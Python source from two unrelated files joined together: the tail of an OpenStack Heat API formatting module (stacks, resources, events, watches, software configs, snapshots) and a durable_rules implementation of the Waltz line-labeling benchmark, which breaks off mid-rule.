if stack.action != stack.DELETE and stack.status != stack.IN_PROGRESS:
info[rpc_api.STACK_OUTPUTS] = format_stack_outputs(stack,
stack.outputs)
return info
def format_resource_attributes(resource, with_attr=None):
resolver = resource.attributes
if not with_attr:
with_attr = []
def resolve(attr, resolver):
try:
return resolver._resolver(attr)
except Exception:
return None
    # If 'show' is in the attribute schema, resolving it returns all of the
    # resource's attributes, including ones not present in the show API
    # response (such as 'console_urls' for a nova server); users can request
    # those explicitly via the with_attr parameter.
if 'show' in six.iterkeys(resolver):
show_attr = resolve('show', resolver)
        # check that 'show' resolved to a dictionary (i.e. it is not None)
if isinstance(show_attr, collections.Mapping):
for a in with_attr:
if a not in show_attr:
show_attr[a] = resolve(a, resolver)
return show_attr
else:
            # remove the 'show' attribute if it is None or not a mapping,
            # then resolve all attributes manually
del resolver._attributes['show']
attributes = set(list(six.iterkeys(resolver)) + with_attr)
return dict((attr, resolve(attr, resolver))
for attr in attributes)
def format_resource_properties(resource):
def get_property(prop):
try:
return resource.properties[prop]
except (KeyError, ValueError):
return None
return dict((prop, get_property(prop))
for prop in six.iterkeys(resource.properties_schema))
def format_stack_resource(resource, detail=True, with_props=False,
with_attr=None):
"""Return a representation of the given resource.
Return a representation of the given resource that matches the API output
expectations.
"""
created_time = resource.created_time and resource.created_time.isoformat()
last_updated_time = (resource.updated_time and
resource.updated_time.isoformat()) or created_time
res = {
rpc_api.RES_UPDATED_TIME: last_updated_time,
rpc_api.RES_CREATION_TIME: created_time,
rpc_api.RES_NAME: resource.name,
rpc_api.RES_PHYSICAL_ID: resource.resource_id or '',
rpc_api.RES_ACTION: resource.action,
rpc_api.RES_STATUS: resource.status,
rpc_api.RES_STATUS_DATA: resource.status_reason,
rpc_api.RES_TYPE: resource.type(),
rpc_api.RES_ID: dict(resource.identifier()),
rpc_api.RES_STACK_ID: dict(resource.stack.identifier()),
rpc_api.RES_STACK_NAME: resource.stack.name,
rpc_api.RES_REQUIRED_BY: resource.required_by(),
}
if resource.has_nested():
res[rpc_api.RES_NESTED_STACK_ID] = dict(
resource.nested().identifier())
if resource.stack.parent_resource_name:
res[rpc_api.RES_PARENT_RESOURCE] = resource.stack.parent_resource_name
if detail:
res[rpc_api.RES_DESCRIPTION] = resource.t.description
res[rpc_api.RES_METADATA] = resource.metadata_get()
res[rpc_api.RES_SCHEMA_ATTRIBUTES] = format_resource_attributes(
resource, with_attr)
if with_props:
res[rpc_api.RES_SCHEMA_PROPERTIES] = format_resource_properties(
resource)
return res
def format_stack_preview(stack):
def format_resource(res):
        if isinstance(res, list):
            # build a real list so nested results serialize correctly on py3
            return [format_resource(r) for r in res]
return format_stack_resource(res, with_props=True)
fmt_stack = format_stack(stack, preview=True)
fmt_resources = list(map(format_resource, stack.preview_resources()))
fmt_stack['resources'] = fmt_resources
return fmt_stack
def format_event(event):
stack_identifier = event.stack.identifier()
event_timestamp = event.timestamp or timeutils.utcnow()
result = {
rpc_api.EVENT_ID: dict(event.identifier()),
rpc_api.EVENT_STACK_ID: dict(stack_identifier),
rpc_api.EVENT_STACK_NAME: stack_identifier.stack_name,
rpc_api.EVENT_TIMESTAMP: event_timestamp.isoformat(),
rpc_api.EVENT_RES_NAME: event.resource_name,
rpc_api.EVENT_RES_PHYSICAL_ID: event.physical_resource_id,
rpc_api.EVENT_RES_ACTION: event.action,
rpc_api.EVENT_RES_STATUS: event.status,
rpc_api.EVENT_RES_STATUS_DATA: event.reason,
rpc_api.EVENT_RES_TYPE: event.resource_type,
rpc_api.EVENT_RES_PROPERTIES: event.resource_properties,
}
return result
def format_notification_body(stack):
# some other possibilities here are:
# - template name
# - template size
# - resource count
if stack.status is not None and stack.action is not None:
state = '_'.join(stack.state)
else:
state = 'Unknown'
result = {
rpc_api.NOTIFY_TENANT_ID: stack.context.tenant_id,
rpc_api.NOTIFY_USER_ID: stack.context.user,
rpc_api.NOTIFY_STACK_ID: stack.id,
rpc_api.NOTIFY_STACK_NAME: stack.name,
rpc_api.NOTIFY_STATE: state,
rpc_api.NOTIFY_STATE_REASON: stack.status_reason,
rpc_api.NOTIFY_CREATE_AT: stack.created_time.isoformat(),
}
return result
def format_watch(watch):
updated_at = watch.updated_at or timeutils.utcnow()
result = {
rpc_api.WATCH_ACTIONS_ENABLED: watch.rule.get(
rpc_api.RULE_ACTIONS_ENABLED),
rpc_api.WATCH_ALARM_ACTIONS: watch.rule.get(
rpc_api.RULE_ALARM_ACTIONS),
rpc_api.WATCH_TOPIC: watch.rule.get(rpc_api.RULE_TOPIC),
rpc_api.WATCH_UPDATED_TIME: updated_at.isoformat(),
rpc_api.WATCH_DESCRIPTION: watch.rule.get(rpc_api.RULE_DESCRIPTION),
rpc_api.WATCH_NAME: watch.name,
rpc_api.WATCH_COMPARISON: watch.rule.get(rpc_api.RULE_COMPARISON),
rpc_api.WATCH_DIMENSIONS: watch.rule.get(
rpc_api.RULE_DIMENSIONS) or [],
rpc_api.WATCH_PERIODS: watch.rule.get(rpc_api.RULE_PERIODS),
rpc_api.WATCH_INSUFFICIENT_ACTIONS:
watch.rule.get(rpc_api.RULE_INSUFFICIENT_ACTIONS),
rpc_api.WATCH_METRIC_NAME: watch.rule.get(rpc_api.RULE_METRIC_NAME),
rpc_api.WATCH_NAMESPACE: watch.rule.get(rpc_api.RULE_NAMESPACE),
rpc_api.WATCH_OK_ACTIONS: watch.rule.get(rpc_api.RULE_OK_ACTIONS),
rpc_api.WATCH_PERIOD: watch.rule.get(rpc_api.RULE_PERIOD),
rpc_api.WATCH_STATE_REASON: watch.rule.get(rpc_api.RULE_STATE_REASON),
rpc_api.WATCH_STATE_REASON_DATA:
watch.rule.get(rpc_api.RULE_STATE_REASON_DATA),
rpc_api.WATCH_STATE_UPDATED_TIME: watch.rule.get(
rpc_api.RULE_STATE_UPDATED_TIME, timeutils.utcnow()).isoformat(),
rpc_api.WATCH_STATE_VALUE: watch.state,
rpc_api.WATCH_STATISTIC: watch.rule.get(rpc_api.RULE_STATISTIC),
rpc_api.WATCH_THRESHOLD: watch.rule.get(rpc_api.RULE_THRESHOLD),
rpc_api.WATCH_UNIT: watch.rule.get(rpc_api.RULE_UNIT),
rpc_api.WATCH_STACK_ID: watch.stack_id
}
return result
def format_watch_data(wd):
# Demangle DB format data into something more easily used in the API
# We are expecting a dict with exactly two items, Namespace and
# a metric key
namespace = wd.data['Namespace']
metric = [(k, v) for k, v in wd.data.items() if k != 'Namespace']
if len(metric) == 1:
metric_name, metric_data = metric[0]
else:
LOG.error(_LE("Unexpected number of keys in watch_data.data!"))
return
result = {
rpc_api.WATCH_DATA_ALARM: wd.watch_rule.name,
rpc_api.WATCH_DATA_METRIC: metric_name,
rpc_api.WATCH_DATA_TIME: wd.created_at.isoformat(),
rpc_api.WATCH_DATA_NAMESPACE: namespace,
rpc_api.WATCH_DATA: metric_data
}
return result
def format_validate_parameter(param):
"""Format a template parameter for validate template API call.
Formats a template parameter and its schema information from the engine's
internal representation (i.e. a Parameter object and its associated
Schema object) to a representation expected by the current API (for example
    to be compatible with CFN syntax).
"""
# map of Schema object types to API expected types
schema_to_api_types = {
param.schema.STRING: rpc_api.PARAM_TYPE_STRING,
param.schema.NUMBER: rpc_api.PARAM_TYPE_NUMBER,
param.schema.LIST: rpc_api.PARAM_TYPE_COMMA_DELIMITED_LIST,
param.schema.MAP: rpc_api.PARAM_TYPE_JSON,
param.schema.BOOLEAN: rpc_api.PARAM_TYPE_BOOLEAN
}
res = {
rpc_api.PARAM_TYPE: schema_to_api_types.get(param.schema.type,
param.schema.type),
rpc_api.PARAM_DESCRIPTION: param.description(),
rpc_api.PARAM_NO_ECHO: 'true' if param.hidden() else 'false',
rpc_api.PARAM_LABEL: param.label()
}
if param.has_default():
res[rpc_api.PARAM_DEFAULT] = param.default()
if param.user_value:
res[rpc_api.PARAM_VALUE] = param.user_value
constraint_description = []
# build constraints
for c in param.schema.constraints:
if isinstance(c, constr.Length):
if c.min is not None:
res[rpc_api.PARAM_MIN_LENGTH] = c.min
if c.max is not None:
res[rpc_api.PARAM_MAX_LENGTH] = c.max
elif isinstance(c, constr.Range):
if c.min is not None:
res[rpc_api.PARAM_MIN_VALUE] = c.min
if c.max is not None:
res[rpc_api.PARAM_MAX_VALUE] = c.max
elif isinstance(c, constr.AllowedValues):
res[rpc_api.PARAM_ALLOWED_VALUES] = list(c.allowed)
elif isinstance(c, constr.AllowedPattern):
res[rpc_api.PARAM_ALLOWED_PATTERN] = c.pattern
elif isinstance(c, constr.CustomConstraint):
res[rpc_api.PARAM_CUSTOM_CONSTRAINT] = c.name
if c.description:
constraint_description.append(c.description)
if constraint_description:
res[rpc_api.PARAM_CONSTRAINT_DESCRIPTION] = " ".join(
constraint_description)
return res
def format_software_config(sc, detail=True):
if sc is None:
return
result = {
rpc_api.SOFTWARE_CONFIG_ID: sc.id,
rpc_api.SOFTWARE_CONFIG_NAME: sc.name,
rpc_api.SOFTWARE_CONFIG_GROUP: sc.group,
rpc_api.SOFTWARE_CONFIG_CREATION_TIME: sc.created_at.isoformat()
}
if detail:
result[rpc_api.SOFTWARE_CONFIG_CONFIG] = sc.config['config']
result[rpc_api.SOFTWARE_CONFIG_INPUTS] = sc.config['inputs']
result[rpc_api.SOFTWARE_CONFIG_OUTPUTS] = sc.config['outputs']
result[rpc_api.SOFTWARE_CONFIG_OPTIONS] = sc.config['options']
return result
def format_software_deployment(sd):
if sd is None:
return
result = {
rpc_api.SOFTWARE_DEPLOYMENT_ID: sd.id,
rpc_api.SOFTWARE_DEPLOYMENT_SERVER_ID: sd.server_id,
rpc_api.SOFTWARE_DEPLOYMENT_INPUT_VALUES: sd.input_values,
rpc_api.SOFTWARE_DEPLOYMENT_OUTPUT_VALUES: sd.output_values,
rpc_api.SOFTWARE_DEPLOYMENT_ACTION: sd.action,
rpc_api.SOFTWARE_DEPLOYMENT_STATUS: sd.status,
rpc_api.SOFTWARE_DEPLOYMENT_STATUS_REASON: sd.status_reason,
rpc_api.SOFTWARE_DEPLOYMENT_CONFIG_ID: sd.config.id,
rpc_api.SOFTWARE_DEPLOYMENT_CREATION_TIME: sd.created_at.isoformat(),
}
if sd.updated_at:
result[rpc_api.SOFTWARE_DEPLOYMENT_UPDATED_TIME] = (
sd.updated_at.isoformat())
return result
def format_snapshot(snapshot):
if snapshot is None:
return
result = {
rpc_api.SNAPSHOT_ID: snapshot.id,
rpc_api.SNAPSHOT_NAME: snapshot.name,
rpc_api.SNAPSHOT_STATUS: snapshot.status,
rpc_api.SNAPSHOT_STATUS_REASON: snapshot.status_reason,
rpc_api.SNAPSHOT_DATA: snapshot.data,
rpc_api.SNAPSHOT_CREATION_TIME: snapshot.created_at.isoformat(),
}
return result
from durable.lang import *
import math
import datetime
import json
_fact_count = 0
def create_and_post(host, fact):
global _fact_count
fact['id'] = _fact_count
fact['sid'] = 1
host.post('waltzdb', fact)
_fact_count += 1
def create_and_assert(host, fact):
global _fact_count
fact['id'] = _fact_count
fact['sid'] = 1
host.assert_fact('waltzdb', fact)
_fact_count += 1
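# Points are packed into a single integer as val = 100 * x + y; get_x and
# get_y below recover the coordinates with floor division and modulo.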
def get_x(val):
return math.floor(val / 100)
def get_y(val):
return val % 100
def get_angle(p1, p2):
delta_x = get_x(p2) - get_x(p1)
delta_y = get_y(p2) - get_y(p1)
if delta_x == 0:
if delta_y > 0:
return math.pi / 2
elif delta_y < 0:
return -math.pi / 2
elif delta_y == 0:
if delta_x > 0:
return 0
elif delta_x < 0:
return math.pi
else:
return math.atan2(delta_y, delta_x)
def get_inscribable_angle(base_point, p1, p2):
angle1 = get_angle(base_point, p1)
angle2 = get_angle(base_point, p2)
temp = math.fabs(angle1 - angle2)
if temp > math.pi:
return math.fabs(2 * math.pi - temp)
return temp
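# A 3-junction is classified by the smallest sum of two inscribed angles:
# a sum of ~pi is a 'tee', greater than pi a 'fork', less than pi an 'arrow'.
# The point shared by the two chosen angles is stored as j['p2'].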
def make_3j_junction(j, base_point, p1, p2, p3):
angle12 = get_inscribable_angle(base_point, p1, p2)
angle13 = get_inscribable_angle(base_point, p1, p3)
angle23 = get_inscribable_angle(base_point, p2, p3)
sum1213 = angle12 + angle13
sum1223 = angle12 + angle23
sum1323 = angle13 + angle23
total = 0
if sum1213 < sum1223:
if sum1213 < sum1323:
total = sum1213
j['p2'] = p1; j['p1'] = p2; j['p3'] = p3
else:
total = sum1323
j['p2'] = p3; j['p1'] = p1; j['p3'] = p2
else:
if sum1223 < sum1323:
total = sum1223
j['p2'] = p2; j['p1'] = p1; j['p3'] = p3
else:
total = sum1323
j['p2'] = p3; j['p1'] = p1; j['p3'] = p2
if math.fabs(total - math.pi) < 0.001:
j['name'] = 'tee'
elif total > math.pi:
j['name'] = 'fork'
else:
j['name'] = 'arrow'
def unix_time(dt):
epoch = datetime.datetime.utcfromtimestamp(0)
delta = dt - epoch
return delta.total_seconds()
def unix_time_millis(dt):
return unix_time(dt) * 1000.0
with ruleset('waltzdb'):
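    # The ruleset advances through explicit 'stage' facts:
    # duplicate -> detect_junctions -> find_initial_boundary ->
    # find_second_boundary -> labeling -> visiting_2j/visiting_3j ->
    # marking -> checking (-> remove_label -> checking) -> labeling.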
@when_all(cap(1000),
c.line << m.t == 'line',
c.stage << (m.t == 'stage') & (m.l == 'duplicate'))
def reverse_edges(c):
for frame in c.m:
print('Edge {0} {1}'.format(frame.line.p1, frame.line.p2))
print('Edge {0} {1}'.format(frame.line.p2, frame.line.p1))
c.post({'id': c.s.gid, 't': 'edge', 'p1': frame.line.p1, 'p2': frame.line.p2, 'joined': False})
c.post({'id': c.s.gid + 1, 't': 'edge', 'p1': frame.line.p2, 'p2': frame.line.p1, 'joined': False})
c.s.gid += 2
@when_all(pri(1),
c.stage << (m.t == 'stage') & (m.l == 'duplicate'))
def done_reversing(c):
c.retract_fact(c.stage)
c.assert_fact({'id': c.s.gid, 't': 'stage', 'l': 'detect_junctions'})
c.s.gid += 1
print('detect_junctions')
@when_all(cap(1000),
c.e1 << (m.t == 'edge') & (m.joined == False),
c.e2 << (m.t == 'edge') & (m.joined == False) & (m.p1 == c.e1.p1) & (m.p2 != c.e1.p2),
c.e3 << (m.t == 'edge') & (m.joined == False) & (m.p1 == c.e1.p1) & (m.p2 != c.e1.p2) & (m.p2 != c.e2.p2),
c.stage << (m.t == 'stage') & (m.l == 'detect_junctions'))
def make_3_junction(c):
for frame in c.m:
j = {'id': c.s.gid, 't': 'junction', 'base_point': frame.e1.p1, 'j_t': '3j', 'visited': 'no'}
make_3j_junction(j, frame.e1.p1, frame.e1.p2, frame.e2.p2, frame.e3.p2)
print('Junction {0} {1} {2} {3} {4}'.format(j['name'], j['base_point'], j['p1'], j['p2'], j['p3']))
c.assert_fact(j)
frame.e1.id = c.s.gid + 1; frame.e1.joined = True; frame.e1.j_t = '3j'; c.assert_fact(frame.e1)
frame.e2.id = c.s.gid + 2; frame.e2.joined = True; frame.e2.j_t = '3j'; c.assert_fact(frame.e2)
frame.e3.id = c.s.gid + 3; frame.e3.joined = True; frame.e3.j_t = '3j'; c.assert_fact(frame.e3)
c.s.gid += 4
@when_all(cap(1000),
c.e1 << (m.t == 'edge') & (m.joined == False),
c.e2 << (m.t == 'edge') & (m.joined == False) & (m.p1 == c.e1.p1) & (m.p2 != c.e1.p2),
none((m.t == 'edge') & (m.p1 == c.e1.p1) & (m.p2 != c.e1.p2) & (m.p2 != c.e2.p2)),
c.stage << (m.t == 'stage') & (m.l == 'detect_junctions'))
def make_l(c):
for frame in c.m:
j = {'id': c.s.gid, 't': 'junction', 'base_point': frame.e1.p1, 'j_t': '2j', 'visited': 'no', 'name': 'L', 'p1': frame.e1.p2, 'p2': frame.e2.p2}
print('Junction L {0} {1} {2}'.format(frame.e1.p1, frame.e1.p2, frame.e2.p2))
c.assert_fact(j)
frame.e1.id = c.s.gid + 1; frame.e1.joined = True; frame.e1.j_t = '2j'; c.assert_fact(frame.e1)
frame.e2.id = c.s.gid + 2; frame.e2.joined = True; frame.e2.j_t = '2j'; c.assert_fact(frame.e2)
c.s.gid += 3
@when_all(pri(1),
c.stage << (m.t == 'stage') & (m.l == 'detect_junctions'))
def done_detecting(c):
c.retract_fact(c.stage)
c.post({'id': c.s.gid, 't': 'stage', 'l': 'find_initial_boundary'})
c.s.gid += 1
print('find_initial_boundary')
@when_all(c.j << (m.t == 'junction') & (m.j_t == '2j') & (m.visited == 'no'),
c.e1 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p1),
c.e2 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p2),
none((m.t == 'junction') & (m.j_t == '2j') & (m.visited == 'no') & (m.base_point > c.j.base_point)),
(m.t == 'stage') & (m.l == 'find_initial_boundary'))
def initial_boundary_junction_l(c):
#c.retract_fact(c.j); c.j.id = c.s.gid; c.j.visited = 'yes'; c.assert_fact(c.j)
c.assert_fact({'id': c.s.gid + 1, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p1, 'label_name': 'B', 'lid': '1'})
c.assert_fact({'id': c.s.gid + 2, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p2, 'label_name': 'B', 'lid': '1'})
c.post({'id': c.s.gid + 3, 't': 'stage', 'l': 'find_second_boundary'})
c.s.gid += 4
print('find_second_boundary')
@when_all(c.j << (m.t == 'junction') & (m.j_t == '3j') & (m.name == 'arrow') & (m.visited == 'no'),
c.e1 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p1),
c.e2 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p2),
c.e3 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p3),
none((m.t == 'junction') & (m.visited == 'no') & (m.base_point > c.j.base_point)),
(m.t == 'stage') & (m.l == 'find_initial_boundary'))
def initial_boundary_junction_arrow(c):
#c.retract_fact(c.j); c.j.id = c.s.gid; c.j.visited = 'yes'; c.assert_fact(c.j)
c.assert_fact({'id': c.s.gid + 1, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p1, 'label_name': 'B', 'lid': '14'})
c.assert_fact({'id': c.s.gid + 2, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p2, 'label_name': '+', 'lid': '14'})
c.assert_fact({'id': c.s.gid + 3, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p3, 'label_name': 'B', 'lid': '14'})
c.post({'id': c.s.gid + 4, 't': 'stage', 'l': 'find_second_boundary'})
c.s.gid += 5
print('find_second_boundary')
@when_all(c.j << (m.t == 'junction') & (m.j_t == '2j') & (m.visited == 'no'),
c.e1 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p1),
c.e2 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p2),
none((m.t == 'junction') & (m.visited != 'no') & (m.base_point < c.j.base_point)),
(m.t == 'stage') & (m.l == 'find_second_boundary'))
def second_boundary_junction_l(c):
c.retract_fact(c.j); c.j.id = c.s.gid; c.j.visited = 'yes'; c.assert_fact(c.j)
c.assert_fact({'id': c.s.gid + 1, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p1, 'label_name': 'B', 'lid': '1'})
c.assert_fact({'id': c.s.gid + 2, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p2, 'label_name': 'B', 'lid': '1'})
c.post({'id': c.s.gid + 3, 't': 'stage', 'l': 'labeling'})
c.s.gid += 4
print('labeling')
@when_all(c.j << (m.t == 'junction') & (m.j_t == '3j') & (m.name == 'arrow') & (m.visited == 'no'),
c.e1 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p1),
c.e2 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p2),
c.e3 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p3),
none((m.t == 'junction') & (m.visited != 'no') & (m.base_point < c.j.base_point)),
(m.t == 'stage') & (m.l == 'find_second_boundary'))
def second_boundary_junction_arrow(c):
c.retract_fact(c.j); c.j.id = c.s.gid; c.j.visited = 'yes'; c.assert_fact(c.j)
c.assert_fact({'id': c.s.gid + 1, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p1, 'label_name': 'B', 'lid': '14'})
c.assert_fact({'id': c.s.gid + 2, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p2, 'label_name': '+', 'lid': '14'})
c.assert_fact({'id': c.s.gid + 3, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p3, 'label_name': 'B', 'lid': '14'})
c.post({'id': c.s.gid + 4, 't': 'stage', 'l': 'labeling'})
c.s.gid += 5
print('labeling')
@when_all(c.j << (m.t == 'junction') & (m.j_t == '3j') & (m.visited == 'no'),
(m.t == 'stage') & (m.l == 'labeling'))
def start_visit_3_junction(c):
c.retract_fact(c.j); c.j.id = c.s.gid; c.j.visited = 'now'; c.assert_fact(c.j)
c.assert_fact({'id': c.s.gid + 1, 't': 'stage', 'l': 'visiting_3j'})
c.s.gid += 2
print('visiting_3j')
@when_all(c.j << (m.t == 'junction') & (m.j_t == '2j') & (m.visited == 'no'),
(m.t == 'stage') & (m.l == 'labeling'))
def start_visit_2_junction(c):
c.retract_fact(c.j); c.j.id = c.s.gid; c.j.visited = 'now'; c.assert_fact(c.j)
c.assert_fact({'id': c.s.gid + 1, 't': 'stage', 'l': 'visiting_2j'})
c.s.gid += 2
print('visiting_2j')
@when_all(pri(1),
(m.t == 'stage') & (m.l == 'labeling'))
def done_labeling(c):
print('end {0}'.format(unix_time_millis(datetime.datetime.now()) - c.s.start_time))
def visit_3j(c):
print('Edge Label {0} {1} {2} {3}'.format(c.j.base_point, c.j.p1, c.l.n1, c.l.lid))
print('Edge Label {0} {1} {2} {3}'.format(c.j.base_point, c.j.p2, c.l.n2, c.l.lid))
print('Edge Label {0} {1} {2} {3}'.format(c.j.base_point, c.j.p3, c.l.n3, c.l.lid))
c.assert_fact({'id': c.s.gid, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p1, 'label_name': c.l.n1, 'lid': c.l.lid})
c.assert_fact({'id': c.s.gid + 1, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p2, 'label_name': c.l.n2, 'lid': c.l.lid})
c.assert_fact({'id': c.s.gid + 2, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p3, 'label_name': c.l.n3, 'lid': c.l.lid})
c.s.gid += 3
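    # The eight visit_3j_* rules below enumerate every presence/absence
    # combination of matching edge_labels on the three incoming edges, so a
    # candidate label is applied whenever nothing contradicts it.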
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n1),
c.el2 << (m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n2),
c.el3 << (m.t == 'edge_label') & (m.p1 == c.j.p3) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n3),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_3j'))
def visit_3j_0(c):
visit_3j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
none((m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point)),
c.el2 << (m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n2),
c.el3 << (m.t == 'edge_label') & (m.p1 == c.j.p3) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n3),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_3j'))
def visit_3j_1(c):
visit_3j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n1),
none((m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point)),
c.el3 << (m.t == 'edge_label') & (m.p1 == c.j.p3) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n3),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_3j'))
def visit_3j_2(c):
visit_3j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
none((m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point)),
c.el3 << (m.t == 'edge_label') & (m.p1 == c.j.p3) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n3),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_3j'))
def visit_3j_3(c):
visit_3j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n1),
c.el2 << (m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n2),
none((m.t == 'edge_label') & (m.p1 == c.j.p3) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_3j'))
def visit_3j_4(c):
visit_3j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
none((m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point)),
c.el2 << (m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n2),
none((m.t == 'edge_label') & (m.p1 == c.j.p3) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_3j'))
def visit_3j_5(c):
visit_3j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n1),
none((m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.p3) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_3j'))
def visit_3j_6(c):
visit_3j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
none((m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.p3) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_3j'))
def visit_3j_7(c):
visit_3j(c)
@when_all(pri(1),
(m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.stage << (m.t == 'stage') & (m.l == 'visiting_3j'))
def end_visit_3j(c):
c.retract_fact(c.stage)
c.assert_fact({'id': c.s.gid, 't': 'stage', 'l': 'marking'})
c.s.gid += 1
print('marking')
def visit_2j(c):
print('Edge Label {0} {1} {2} {3}'.format(c.j.base_point, c.j.p1, c.l.n1, c.l.lid))
print('Edge Label {0} {1} {2} {3}'.format(c.j.base_point, c.j.p2, c.l.n2, c.l.lid))
c.assert_fact({'id': c.s.gid, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p1, 'label_name': c.l.n1, 'lid': c.l.lid})
c.assert_fact({'id': c.s.gid + 1, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p2, 'label_name': c.l.n2, 'lid': c.l.lid})
c.s.gid += 2
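    # Likewise, the four visit_2j_* rules cover the 2^2 presence/absence
    # combinations for the two edges of an L junction.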
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '2j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n1),
c.el2 << (m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n2),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_2j'))
def visit_2j_0(c):
visit_2j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '2j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
none((m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point)),
